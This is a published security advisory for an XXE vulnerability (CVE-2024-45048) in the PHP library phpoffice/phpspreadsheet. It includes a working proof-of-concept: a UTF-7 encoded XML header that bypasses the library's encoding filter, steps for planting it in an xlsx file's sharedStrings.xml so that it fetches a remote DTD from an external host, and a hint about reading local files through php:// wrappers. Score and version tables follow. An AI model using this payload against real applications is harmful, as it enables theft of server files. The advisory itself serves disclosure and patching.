Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)
Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this:
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>
If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.
1) Create simple xlsx file
2) Rename xlsx to zip
3) Go to the zip and open the xl/sharedStrings.xml file in edit mode.
4) Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>
5) Save sharedStrings.xml file and rename zip back to xlsx.
6) Use minimal php code that simply opens this xlsx file:
use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
7) You will receive the request to your http://%webhook%/file.dtd
8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.
Read local files
| Score | Percentile |
|---|---|
| 0.15% | 36.42% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 8.8 | 3.1 | — |
|
| 8.7 | 4.0 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-ghg6-32f9-2jp7 ↗ |
| CVE | CVE-2024-45048 ↗ |
| CWE id | Name |
|---|---|
| CWE-611 | Improper Restriction of XML External Entity Reference |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| composer | phpoffice/phpspreadsheet | < 1.29.1 | 1.29.1 | — |
| composer | phpoffice/phpspreadsheet | >= 2.2.0, < 2.2.1 | 2.2.1 | — |
| composer | phpoffice/phpspreadsheet | >= 2.0.0, < 2.1.1 | 2.1.1 | — |
| composer | phpoffice/phpexcel | <= 1.8.2 | — | — |